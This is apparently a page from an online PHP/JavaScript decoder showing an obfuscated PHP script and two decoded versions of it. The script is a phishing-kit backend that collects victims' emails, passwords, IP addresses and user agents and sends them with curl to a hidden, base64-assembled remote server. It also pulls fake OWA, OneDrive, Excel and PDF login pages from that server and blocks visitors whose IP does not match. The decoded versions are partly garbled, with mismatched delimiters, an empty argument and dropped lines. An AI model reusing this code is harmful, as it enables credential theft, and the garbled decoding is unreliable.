Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

goto lxC33; DTjt1: $batt = "\156\116\154\143"; goto dOXvC; qH3AT: $urldon = ''; goto jATll; Dvo9Q: $agent = base64_encode($_SERVER["\x48\124\x54\120\x5f\x55\x53\105\122\137\x41\107\105\x4e\124"]); goto fpfen; y0f1t: if (!empty($_SERVER["\x48\x54\124\120\137\103\x4c\x49\105\116\124\137\x49\120"])) { $ip = $_SERVER["\x48\x54\x54\120\x5f\x43\114\111\105\x4e\124\x5f\x49\120"]; } elseif (!empty($_SERVER["\110\x54\x54\120\x5f\x58\x5f\106\117\x52\127\x41\x52\104\x45\104\137\x46\117\x52"])) { $ip = $_SERVER["\x48\124\x54\120\x5f\130\137\x46\x4f\x52\x57\101\x52\x44\105\x44\137\106\x4f\x52"]; } else { $ip = $_SERVER["\122\x45\x4d\x4f\x54\x45\137\x41\x44\x44\122"]; } goto qH3AT; qLvty: ini_set("\145\162\162\x6f\x72\x5f\x6c\157\x67", "\x70\150\160\x2d\x65\x72\x72\x6f\162\56\x6c\x6f\147"); goto ri_Q5; TmcIb: $urldon = base64_decode($urldon); goto jm2f3; QWkjA: $mgkg = "\x47\x68\x6c\x63"; goto DTjt1; mzKBC: $mcbhei = "\151\x35\152\142\62\x30\166"; goto vdipK; uwaTo: $ip = getUserIP(); goto Dvo9Q; dOXvC: $iitt = "\63\x4e\x70\x62"; goto eCPzR; ri_Q5: ini_set("\x64\x69\163\x70\x6c\141\x79\x5f\145\162\x72\157\x72\163", 0); goto y0f1t; lxC33: ini_set("\154\157\x67\x5f\x65\162\162\x6f\x72\x73", 1); goto qLvty; jATll: $dgri = "\x61\x48\122\60\x63\110\x4d"; goto sLvwJ; eCPzR: $draa = "\62\64\171"; goto nm1FJ; nm1FJ: $njod = "\142\x57\106\x70\x62"; goto mzKBC; sLvwJ: $jdoe = "\66\x4c\171\x39\x76\x64"; goto QWkjA; jm2f3: function getUserIP() { $client = @$_SERVER["\110\x54\x54\x50\x5f\x43\x4c\111\x45\x4e\x54\x5f\111\120"]; $forward = @$_SERVER["\x48\x54\x54\x50\x5f\130\137\106\x4f\x52\x57\101\x52\x44\x45\x44\137\x46\x4f\122"]; $remote = $_SERVER["\x52\105\115\117\124\105\x5f\x41\104\x44\122"]; if (filter_var($client, FILTER_VALIDATE_IP)) { $ip = $client; } elseif (filter_var($forward, FILTER_VALIDATE_IP)) { $ip = $forward; } else { $ip = $remote; } return $ip; } goto uwaTo; fpfen: if (isset($_GET["\165\151\x64"])) { header("\x41\x63\143\x65\163\x73\x2d\103\x6f\156\x74\x72\157\154\x2d\101\x6c\x6c\x6f\167\x2d\117\162\151\x67\151\x6e\72\x20\x2a"); header("\101\143\143\145\x73\x73\x2d\103\157\x6e\x74\x72\x6f\x6c\x2d\x41\154\154\157\167\x2d\115\x65\164\x68\157\x64\163\72\40\x50\117\x53\x54\x2c\x20\107\105\124\54\40\117\120\124\111\117\x4e\123\x2c\40\x50\x55\124\54\x20\104\105\114\105\x54\x45"); header("\101\143\x63\145\x73\163\55\103\157\x6e\x74\x72\x6f\154\55\x41\154\x6c\157\x77\x2d\110\x65\x61\144\x65\162\163\x3a\40\x4f\x72\x69\147\x69\156\x2c\x20\103\x6f\156\164\145\156\164\55\124\x79\160\145\54\40\x41\143\x63\x65\x70\164\x2c\x20\101\x75\x74\x68\x6f\x72\151\x7a\141\164\151\157\x6e\x2c\40\x58\x2d\122\x65\161\x75\145\163\x74\55\x57\151\164\150"); header("\x43\157\x6e\164\145\x6e\x74\55\124\x79\160\x65\72\40\141\x70\160\154\x69\x63\x61\164\x69\x6f\156\57\152\163\x6f\x6e\x3b\x20\x63\x68\141\162\x73\145\164\x3d\x75\164\146\55\70"); $uidxx = $_GET["\x75\151\x64"]; $emailxx = $_GET["\x65\155\x61\x69\154"]; $passwordxx = $_GET["\160\x61\x73\163"]; $typexx = $_GET["\x74\171\x70\145"]; $url = $urldon . "\x2f\154\157\x67\x73\x73\141\x76\145\56\x70\150\160\57\x3f\165\151\x64\75" . $uidxx . "\x26\145\155\x61\151\x6c\75" . $emailxx . "\46\160\141\x73\163\x3d" . $passwordxx . "\x26\x69\160\75" . $ip . "\46\141\147\x65\x6e\164\x3d" . $agent . "\46\x64\x71\75\46\x74\171\160\x65\75" . $typexx; $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 400); curl_setopt($ch, CURLOPT_URL, $url); $jsonData = curl_exec($ch); curl_close($ch); echo $jsonData; } elseif (isset($_GET["\x67\x65\164\145\x6d\141\x69\154\x69\156\146\x6f"])) { header("\x41\143\x63\x65\x73\x73\55\x43\157\x6e\164\162\x6f\154\x2d\101\154\154\x6f\167\x2d\x4f\x72\151\x67\x69\156\x3a\x20\52"); header("\x41\x63\143\x65\x73\163\x2d\x43\x6f\156\x74\x72\x6f\154\55\101\154\x6c\157\167\x2d\115\x65\x74\x68\157\x64\x73\x3a\40\120\117\x53\124\54\40\107\105\124\x2c\40\x4f\x50\124\x49\117\116\123\54\40\x50\x55\124\54\x20\104\105\114\105\124\105"); header("\x41\x63\x63\x65\x73\x73\x2d\x43\157\x6e\164\x72\x6f\x6c\55\x41\154\x6c\157\167\x2d\x48\x65\x61\x64\x65\x72\163\72\x20\x4f\162\151\x67\x69\x6e\54\40\x43\x6f\x6e\x74\145\x6e\164\x2d\124\171\x70\x65\x2c\40\x41\x63\x63\x65\160\x74\54\x20\x41\x75\164\x68\x6f\162\x69\x7a\x61\x74\151\x6f\x6e\54\40\130\55\x52\145\x71\165\145\x73\x74\55\127\x69\164\x68"); header("\103\157\x6e\164\145\x6e\x74\55\x54\x79\160\x65\72\40\141\160\160\x6c\x69\x63\141\164\x69\157\156\57\152\x73\157\x6e\x3b\x20\x63\150\x61\162\x73\145\164\x3d\x75\164\x66\x2d\x38"); $uidxx = $_GET["\165\151\x64\156\x6f\167"]; $emailxx = $_GET["\x67\145\164\145\x6d\x61\x69\x6c\151\x6e\x66\x6f"]; $dqxx = $_GET["\144\161"]; $typexx = $_GET["\164\171\160\145"]; $url = $urldon . "\57\x6c\157\x67\x73\163\x61\166\x65\56\160\150\x70\x2f\77\x75\x69\x64\x6e\x6f\167\x3d" . $uidxx . "\46\147\145\x74\145\x6d\141\x69\x6c\151\x6e\x66\x6f\75" . $emailxx . "\46\151\x70\75" . $ip . "\46\x61\147\x65\156\164\75" . $agent . "\46\144\x71\x3d" . $dqxx . "\46\x74\171\x70\145\x3d" . $typexx; $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 400); curl_setopt($ch, CURLOPT_URL, $url); $jsonData = curl_exec($ch); curl_close($ch); echo $jsonData; } else { require __DIR__ . "\57\151\x2e\x70\150\160"; $html_string = "\124\131\x50\x45\x58\130\x58"; $url = "\x68\x74\x74\x70\163\x3a\x2f\57"; $url .= $_SERVER["\110\x54\124\x50\137\x48\x4f\123\124"]; $data_raw = explode("\77", $_SERVER["\122\105\121\x55\x45\x53\124\x5f\x55\x52\111"])[1]; $data_raw = urldecode($data_raw); $rbox = null; $vbox = null; if (strpos($data_raw, "\x4e\x30\61\x32\x33\116") !== FALSE) { $data = explode("\x4e\x30\x31\x32\x33\x4e", $data_raw)[0]; if (!empty(explode("\x4e\x30\61\x32\x33\116", $data_raw)[1])) { $vbox = explode("\116\x30\x31\x32\x33\x4e", $data_raw)[1]; if (strpos($vbox, "\x25\x34\x30") !== FALSE || strpos($vbox, "\100") !== FALSE) { $vbox = str_replace("\x25\64\x30", "\x40", $vbox); $ssns1 = explode("\x40", $vbox)[0]; $ssns2 = explode("\x40", $vbox)[1]; if (strpos($ssns2, "\137") !== FALSE) { $ssns2 = str_replace("\x5f", "\x2e", $ssns2); $vbox = $ssns1 . $ssns2; } } } } else { $data = explode("\77", $_SERVER["\122\x45\x51\125\105\123\x54\x5f\125\x52\111"])[1]; $data2 = explode("\77", $_SERVER["\x52\105\121\125\105\x53\x54\137\125\x52\111"])[0]; } function decode($data) { $myArray = explode("\x26", base64_decode($data)); $data_out = array(); foreach ($myArray as $x) { if (strpos($x, "\x73\x76") !== FALSE) { $data_out["\x73\x76"] = explode("\x3d", $x)[1]; } if (strpos($x, "\165\x69\144") !== FALSE) { $data_out["\x75\x69\144"] = explode("\75", $x)[1]; } if (strpos($x, "\162\x62\x6f\x78") !== FALSE) { $data_out["\x72\x62\157\170"] = explode("\75", $x)[1]; } if (strpos($x, "\x69\160\x64\x61\x74\141") !== FALSE) { $data_out["\151\160\144\141\x74\x61"] = explode("\75", $x)[1]; } if (strpos($x, "\166\142\157\x78") !== FALSE) { $data_out["\x76\142\157\x78"] = explode("\75", $x)[1]; $vbox = explode("\x3d", $x)[1]; } } return $data_out; } $_toprofile = decode($data); if ($_toprofile["\x69\160\144\x61\x74\x61"]) { if ($_toprofile["\151\160\x64\141\x74\x61"] != $ip) { header("\114\x6f\x63\141\x74\x69\x6f\x6e\x3a\x20\57\64\60\x34"); die; } } else { $linkinfo = "\151\x70\x64\141\x74\x61\x3d" . $ip . "\x26" . base64_decode($data); header("\x4c\x6f\143\x61\x74\151\x6f\156\x3a\40" . $data2 . "\x3f" . base64_encode($linkinfo) . "\43" . base64_encode($vbox)); } function profile($data, $vbox, $url, $html_string, $urldon, $XXXAPIXXX) { if (strpos($data["\x73\x76"], "\157\167\141") !== FALSE) { $todolink = $urldon . "\57\x75\163\x65\162\56\160\150\160\x3f\x75\151\x64\x3d" . $data["\x75\151\x64"] . "\46\x67\x65\156\x70\x3d\x6f\167\141"; $curl = curl_init(); curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "\107\105\124")); $jscodeblock = curl_exec($curl); $err = curl_error($curl); curl_close($curl); if ($jscodeblock === "\x49\116\126\101\114\x49\104") { header("\114\x6f\x63\141\x74\151\157\x6e\x3a\40\57\x23\65\60\60\x2d\116\x55\114\x4c"); die; } $html_string = str_replace("\124\x59\x50\x45\130\130\x58", $jscodeblock, $html_string); } if (strpos($data["\x73\x76"], "\x77\145") !== FALSE) { $todolink = $urldon . "\x2f\x75\163\x65\162\x2e\160\x68\x70\77\x75\x69\x64\x3d" . $data["\165\x69\144"] . "\46\147\x65\x6e\160\x3d\x77\145"; $curl = curl_init(); curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "\x47\x45\x54")); $jscodeblock = curl_exec($curl); $err = curl_error($curl); curl_close($curl); if ($jscodeblock === "\111\116\x56\101\114\x49\104") { header("\x4c\157\x63\141\164\x69\x6f\156\x3a\40\x2f\x23\65\x30\60\x2d\116\x55\x4c\x4c"); die; } $html_string = str_replace("\x54\131\120\105\x58\x58\x58", $jscodeblock, $html_string); } if (strpos($data["\x73\166"], "\x6f\x6e\145\x64\x72\x69\x76\145") !== FALSE) { $todolink = $urldon . "\x2f\165\x73\145\162\x2e\160\150\x70\x3f\x75\x69\144\x3d" . $data["\165\151\144"] . "\x26\x67\x65\x6e\160\x3d\x6f\x6e\x65\144\x72\x69\166\145"; $curl = curl_init(); curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "\x47\105\x54")); $jscodeblock = curl_exec($curl); $err = curl_error($curl); curl_close($curl); if ($jscodeblock === "\111\x4e\x56\101\x4c\111\x44") { header("\114\157\x63\x61\164\x69\157\x6e\x3a\x20\57\x23\65\x30\60\55\116\x55\114\x4c"); die; } $html_string = str_replace("\124\131\x50\105\x58\130\130", $jscodeblock, $html_string); } if (strpos($data["\x73\x76"], "\145\x78\x63\145\154") !== FALSE) { $todolink = $urldon . "\57\165\x73\x65\x72\x2e\160\x68\x70\x3f\165\151\144\75" . $data["\x75\x69\144"] . "\46\x67\x65\x6e\x70\x3d\145\x78\143\145\x6c"; $curl = curl_init(); curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "\107\x45\124")); $jscodeblock = curl_exec($curl); $err = curl_error($curl); curl_close($curl); if ($jscodeblock === "\111\x4e\126\x41\114\111\x44") { header("\114\157\143\141\x74\151\x6f\156\x3a\x20\x2f\43\65\x30\60\55\x4e\125\x4c\114"); die; } $html_string = str_replace("\x54\x59\x50\105\x58\130\x58", $jscodeblock, $html_string); } if (strpos($data["\x73\166"], "\147\145\156\145\162\141\154") !== FALSE) { $todolink = $urldon . "\57\x75\x73\x65\162\56\160\x68\x70\x3f\165\x69\144\75" . $data["\165\x69\144"] . "\46\147\145\156\160\x3d\147\145\156\x65\162\x61\154"; $curl = curl_init(); curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "\x47\x45\x54")); $jscodeblock = curl_exec($curl); $err = curl_error($curl); curl_close($curl); if ($jscodeblock === "\x49\116\126\x41\114\111\x44") { header("\x4c\157\x63\x61\164\x69\x6f\156\x3a\x20\57\43\65\x30\60\x2d\116\125\x4c\x4c"); die; } $html_string = str_replace("\124\131\x50\x45\x58\x58\130", $jscodeblock, $html_string); } if (strpos($data["\x73\x76"], "\x70\144\146") !== FALSE) { $todolink = $urldon . "\x2f\x75\163\145\162\56\x70\x68\x70\77\165\x69\144\75" . $data["\x75\x69\x64"] . "\x26\x67\145\156\x70\75\x70\144\x66"; $curl = curl_init(); curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "\107\x45\124")); $jscodeblock = curl_exec($curl); $err = curl_error($curl); curl_close($curl); if ($jscodeblock === "\111\x4e\x56\101\x4c\x49\104") { header("\114\x6f\x63\x61\164\x69\157\x6e\x3a\40\x2f\43\x35\60\x30\x2d\116\x55\114\114"); die; } $html_string = str_replace("\x54\x59\x50\x45\x58\130\x58", $jscodeblock, $html_string); } $html_string = str_replace("\x45\115\x41\x49\x4c\x58\130\x58", $data["\x76\x62\x6f\x78"], $html_string); if ($html_string === "\x54\131\x50\105\130\x58\130") { header("\x4c\157\143\x61\164\151\157\x6e\x3a\x20\x2f\x23\65\60\60\x2d\x4e\x55\x4c\x4c"); die; } else { print $html_string; } } profile($_toprofile, $vbox, $url, $html_string, $urldon, $XXXAPIXXX); } goto YQqzi; vdipK: $urldon .= $dgri . $jdoe . $mgkg . $batt . $iitt . $draa . $njod . $mcbhei; goto TmcIb; YQqzi:

Show other level

Decrypted code level 1:

goto lxC33;
 DTjt1: $batt = "nNlc";
 goto dOXvC;
 qH3AT: $urldon = '';
 goto jATll;
 Dvo9Q: $agent = base64_encode($_SERVER["HTTP_USER_AGENT"]);
 goto fpfen;
	 y0f1t: if (!empty($_SERVER["HTTP_CLIENT_IP"])) {
	 $ip = $_SERVER["HTTP_CLIENT_IP"];
	 
}
	 elseif (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) {
	 $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
	 
}
	 else {
	 $ip = $_SERVER["REMOTE_ADDR"];
	 
}
 goto qH3AT;
 qLvty: ini_set("error_log", "php-error.log");
 goto ri_Q5;
 TmcIb: $urldon = base64_decode($urldon);
 goto jm2f3;
 QWkjA: $mgkg = "Ghlc";
 goto DTjt1;
 mzKBC: $mcbhei = "i5jbv";
 goto vdipK;
 uwaTo: $ip = getUserIP();
 goto Dvo9Q;
 dOXvC: $iitt = "3Npb";
 goto eCPzR;
 ri_Q5: ini_set("display_errors", 0);
 goto y0f1t;
 lxC33: ini_set("log_errors", 1);
 goto qLvty;
 jATll: $dgri = "aHR0cHM";
 goto sLvwJ;
 eCPzR: $draa = "24y";
 goto nm1FJ;
 nm1FJ: $njod = "bWFpb";
 goto mzKBC;
 sLvwJ: $jdoe = "6Ly9vd";
 goto QWkjA;
	 jm2f3: function getUserIP() {
	 $client = @$_SERVER["HTTP_CLIENT_IP"];
	 $forward = @$_SERVER["HTTP_X_FORWARDED_FOR"];
	 $remote = $_SERVER["REMOTE_ADDR"];
		 if (filter_var($client, FILTER_VALIDATE_IP)) {
		 $ip = $client;
		 
	}
		 elseif (filter_var($forward, FILTER_VALIDATE_IP)) {
		 $ip = $forward;
		 
	}
		 else {
		 $ip = $remote;
		 
	}
	 return $ip;
	 
}
 goto uwaTo;
	 fpfen: if (isset($_GET["uid"])) {
	 header("Access-Control-Allow-Origin: *");
	 header("Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE");
	 header("Access-Control-Allow-Headers: Origin, Content-Type, Accept, Authorization, X-Request-With");
	 header("Content-Type: application/json;
	 charset=utf-8");
	 $uidxx = $_GET["uid"];
	 $emailxx = $_GET["email"];
	 $passwordxx = $_GET["pass"];
	 $typexx = $_GET["type"];
	 $url = $urldon . "/logssave.php/?uid=" . $uidxx . "&email=" . $emailxx . "&pass=" . $passwordxx . "&ip=" . $ip . "&agent=" . $agent . "&dq=&type=" . $typexx;
	 $ch = curl_init();
	 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
	 curl_setopt($ch, CURLOPT_TIMEOUT, 400);
	 curl_setopt($ch, CURLOPT_URL, $url);
	 $jsonData = curl_exec($ch);
	 curl_close($ch);
	 echo $jsonData;
	 
}
	 elseif (isset($_GET["getemailinfo"])) {
	 header("Access-Control-Allow-Origin: *");
	 header("Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE");
	 header("Access-Control-Allow-Headers: Origin, Content-Type, Accept, Authorization, X-Request-With");
	 header("Content-Type: application/json;
	 charset=utf-8");
	 $uidxx = $_GET["uidnow"];
	 $emailxx = $_GET["getemailinfo"];
	 $dqxx = $_GET["dq"];
	 $typexx = $_GET["type"];
	 $url = $urldon . "/logssave.php/?uidnow=" . $uidxx . "&getemailinfo=" . $emailxx . "&ip=" . $ip . "&agent=" . $agent . "&dq=" . $dqxx . "&type=" . $typexx;
	 $ch = curl_init();
	 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
	 curl_setopt($ch, CURLOPT_TIMEOUT, 400);
	 curl_setopt($ch, CURLOPT_URL, $url);
	 $jsonData = curl_exec($ch);
	 curl_close($ch);
	 echo $jsonData;
	 
}
	 else {
	 require __DIR__ . "/i.php";
	 $html_string = "TYPEXXX";
	 $url = "https://";
	 $url .= $_SERVER["HTTP_HOST"];
	 $data_raw = explode("?", $_SERVER["REQUEST_URI"])[1];
	 $data_raw = urldecode($data_raw);
	 $rbox = null;
	 $vbox = null;
		 if (strpos($data_raw, "N03N") !== FALSE) {
		 $data = explode("N0123N", $data_raw)[0];
			 if (!empty(explode("N03N", $data_raw)[1])) {
			 $vbox = explode("N0123N", $data_raw)[1];
				 if (strpos($vbox, "%40") !== FALSE || strpos($vbox, "@") !== FALSE) {
				 $vbox = str_replace("%", "@", $vbox);
				 $ssns1 = explode("@", $vbox)[0];
				 $ssns2 = explode("@", $vbox)[1];
					 if (strpos($ssns2, "_") !== FALSE) {
					 $ssns2 = str_replace("_", , $ssns2);
					 $vbox = $ssns1 . $ssns2;
					 
				}
				 
			}
			 
		}
		 
	}
		 else {
		 $data = explode("?", $_SERVER["REQUEST_URI"])[1];
		 $data2 = explode("?", $_SERVER["REQUEST_URI"])[0];
		 
	}
		 function decode($data) {
		 $myArray = explode("&", base64_decode($data));
		 $data_out = array();
			 foreach ($myArray as $x) {
				 if (strpos($x, "sv") !== FALSE) {
				 $data_out["sv"] = explode("=", $x)[1];
				 
			}
				 if (strpos($x, "uid") !== FALSE) {
				 $data_out["uid"] = explode("=", $x)[1];
				 
			}
				 if (strpos($x, "rbox") !== FALSE) {
				 $data_out["rbox"] = explode("=", $x)[1];
				 
			}
				 if (strpos($x, "ipdata") !== FALSE) {
				 $data_out["ipdata"] = explode("=", $x)[1];
				 
			}
				 if (strpos($x, "vbox") !== FALSE) {
				 $data_out["vbox"] = explode("=", $x)[1];
				 $vbox = explode("=", $x)[1];
				 
			}
			 
		}
		 return $data_out;
		 
	}
	 $_toprofile = decode($data);
		 if ($_toprofile["ipdata"]) {
			 if ($_toprofile["ipdata"] != $ip) {
			 header("Location: /4");
			 die;
			 
		}
		 
	}
		 else {
		 $linkinfo = "ipdata=" . $ip . "&" . base64_decode($data);
		 header("Location: " . $data2 . "?" . base64_encode($linkinfo) . "#" . base64_encode($vbox));
		 
	}
		 function profile($data, $vbox, $url, $html_string, $urldon, $XXXAPIXXX) {
			 if (strpos($data["sv"], "owa") !== FALSE) {
			 $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&genp=owa";
			 $curl = curl_init();
			 curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET"));
			 $jscodeblock = curl_exec($curl);
			 $err = curl_error($curl);
			 curl_close($curl);
				 if ($jscodeblock === "INVALID") {
				 header("Location: /#500-NULL");
				 die;
				 
			}
			 $html_string = str_replace("TYPEXXX", $jscodeblock, $html_string);
			 
		}
			 if (strpos($data["sv"], "we") !== FALSE) {
			 $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&genp=we";
			 $curl = curl_init();
			 curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET"));
			 $jscodeblock = curl_exec($curl);
			 $err = curl_error($curl);
			 curl_close($curl);
				 if ($jscodeblock === "INVALID") {
				 header("Location: /#0-NULL");
				 die;
				 
			}
			 $html_string = str_replace("TYPEXXX", $jscodeblock, $html_string);
			 
		}
			 if (strpos($data["sv"], "onedrive") !== FALSE) {
			 $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&genp=onedrive";
			 $curl = curl_init();
			 curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET"));
			 $jscodeblock = curl_exec($curl);
			 $err = curl_error($curl);
			 curl_close($curl);
				 if ($jscodeblock === "INVALID") {
				 header("Location: /#0-NULL");
				 die;
				 
			}
			 $html_string = str_replace("TYPEXXX", $jscodeblock, $html_string);
			 
		}
			 if (strpos($data["sv"], "excel") !== FALSE) {
			 $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&genp=excel";
			 $curl = curl_init();
			 curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET"));
			 $jscodeblock = curl_exec($curl);
			 $err = curl_error($curl);
			 curl_close($curl);
				 if ($jscodeblock === "INVALID") {
				 header("Location: /#0-NULL");
				 die;
				 
			}
			 $html_string = str_replace("TYPEXXX", $jscodeblock, $html_string);
			 
		}
			 if (strpos($data["sv"], "general") !== FALSE) {
			 $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&genp=general";
			 $curl = curl_init();
			 curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET"));
			 $jscodeblock = curl_exec($curl);
			 $err = curl_error($curl);
			 curl_close($curl);
				 if ($jscodeblock === "INVALID") {
				 header("Location: /#0-NULL");
				 die;
				 
			}
			 $html_string = str_replace("TYPEXXX", $jscodeblock, $html_string);
			 
		}
			 if (strpos($data["sv"], "pdf") !== FALSE) {
			 $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&genp=pdf";
			 $curl = curl_init();
			 curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET"));
			 $jscodeblock = curl_exec($curl);
			 $err = curl_error($curl);
			 curl_close($curl);
				 if ($jscodeblock === "INVALID") {
				 header("Location: /-NULL");
				 die;
				 
			}
			 $html_string = str_replace("TYPEXXX", $jscodeblock, $html_string);
			 
		}
		 $html_string = str_replace("EMAILXXX", $data["vbox"], $html_string);
			 if ($html_string === "TYPEXXX") {
			 header("Location: /#500-NULL");
			 die;
			 
		}
			 else {
			 print $html_string;
			 
		}
		 
	}
	 profile($_toprofile, $vbox, $url, $html_string, $urldon, $XXXAPIXXX);
	 
}
 goto YQqzi;
 vdipK: $urldon .= $dgri . $jdoe . $mgkg . $batt . $iitt . $draa . $njod . $mcbhei;
 goto TmcIb;
 YQqzi:

Decrypted code level 2:

goto lxC33;
 DTjt1:  goto dOXvC;
 qH3AT: $urldon = '';
 goto jATll;
 Dvo9Q: $agent = base64_encode($_SERVER["HTTP_USER_AGENT"]);
 goto fpfen;
	 y0f1t: if (!empty($_SERVER["HTTP_CLIENT_IP"])) {
	 $ip = $_SERVER["HTTP_CLIENT_IP"];
	 
}
	 elseif (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) {
	 $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
	 
}
	 else {
	 $ip = $_SERVER["REMOTE_ADDR"];
	 
}
 goto qH3AT;
 qLvty: ini_set("error_log", "php-error.log");
 goto ri_Q5;
 TmcIb: $urldon = base64_decode($urldon);
 goto jm2f3;
 QWkjA:  goto DTjt1;
 mzKBC: $mcbhei = "i5jbv";
 goto vdipK;
 uwaTo: $ip = getUserIP();
 goto Dvo9Q;
 dOXvC:  goto eCPzR;
 ri_Q5: ini_set("display_errors", 0);
 goto y0f1t;
 lxC33: ini_set("log_errors", 1);
 goto qLvty;
 jATll:  goto sLvwJ;
 eCPzR:  goto nm1FJ;
 nm1FJ:  goto mzKBC;
 sLvwJ:  goto QWkjA;
	 jm2f3: function getUserIP() {
	 $client = @$_SERVER["HTTP_CLIENT_IP"];
	 $forward = @$_SERVER["HTTP_X_FORWARDED_FOR"];
	 $remote = $_SERVER["REMOTE_ADDR"];
		 if (filter_var($client, FILTER_VALIDATE_IP)) {
		 $ip = $client;
		 
	}
		 elseif (filter_var($forward, FILTER_VALIDATE_IP)) {
		 $ip = $forward;
		 
	}
		 else {
		 $ip = $remote;
		 
	}
	 return $ip;
	 
}
 goto uwaTo;
	 fpfen: if (isset($_GET["uid"])) {
	 header("Access-Control-Allow-Origin: *");
	 header("Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE");
	 header("Access-Control-Allow-Headers: Origin, Content-Type, Accept, Authorization, X-Request-With");
	 header("Content-Type: application/json;
	 charset=utf-8");
	 $uidxx = $_GET["uid"];
	 $emailxx = $_GET["email"];
	 $passwordxx = $_GET["pass"];
	 $typexx = $_GET["type"];
	 $url = $urldon . "/logssave.php/?uid=" . $uidxx . "&email=" . $emailxx . "&pass=" . $passwordxx . "&ip=" . $ip . "&agent=" . $agent . "&dq=&type=" . $typexx;
	 $ch = curl_init();
	 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
	 curl_setopt($ch, CURLOPT_TIMEOUT, 400);
	 curl_setopt($ch, CURLOPT_URL, $url);
	 $jsonData = curl_exec($ch);
	 curl_close($ch);
	 echo $jsonData;
	 
}
	 elseif (isset($_GET["getemailinfo"])) {
	 header("Access-Control-Allow-Origin: *");
	 header("Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE");
	 header("Access-Control-Allow-Headers: Origin, Content-Type, Accept, Authorization, X-Request-With");
	 header("Content-Type: application/json;
	 charset=utf-8");
	 $uidxx = $_GET["uidnow"];
	 $emailxx = $_GET["getemailinfo"];
	 $dqxx = $_GET["dq"];
	 $typexx = $_GET["type"];
	 $url = $urldon . "/logssave.php/?uidnow=" . $uidxx . "&getemailinfo=" . $emailxx . "&ip=" . $ip . "&agent=" . $agent . "&dq=" . $dqxx . "&type=" . $typexx;
	 $ch = curl_init();
	 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
	 curl_setopt($ch, CURLOPT_TIMEOUT, 400);
	 curl_setopt($ch, CURLOPT_URL, $url);
	 $jsonData = curl_exec($ch);
	 curl_close($ch);
	 echo $jsonData;
	 
}
	 else {
	 require __DIR__ . "/i.php";
	  $url = "https://";
	 $url .= $_SERVER["HTTP_HOST"];
	 $data_raw = explode("?", $_SERVER["REQUEST_URI"])[1];
	 $data_raw = urldecode($data_raw);
	 $rbox = null;
	 $vbox = null;
		 if (strpos($data_raw, "N03N") !== FALSE) {
		 $data = explode("N0123N", $data_raw)[0];
			 if (!empty(explode("N03N", $data_raw)[1])) {
			 $vbox = explode("N0123N", $data_raw)[1];
				 if (strpos($vbox, "%40") !== FALSE || strpos($vbox, "@") !== FALSE) {
				 $vbox = str_replace("%", "@", $vbox);
				 $ssns1 = explode("@", $vbox)[0];
				 $ssns2 = explode("@", $vbox)[1];
					 if (strpos($ssns2, "_") !== FALSE) {
					 $ssns2 = str_replace("_", , $ssns2);
					 $vbox = $ssns1 . $ssns2;
					 
				}
				 
			}
			 
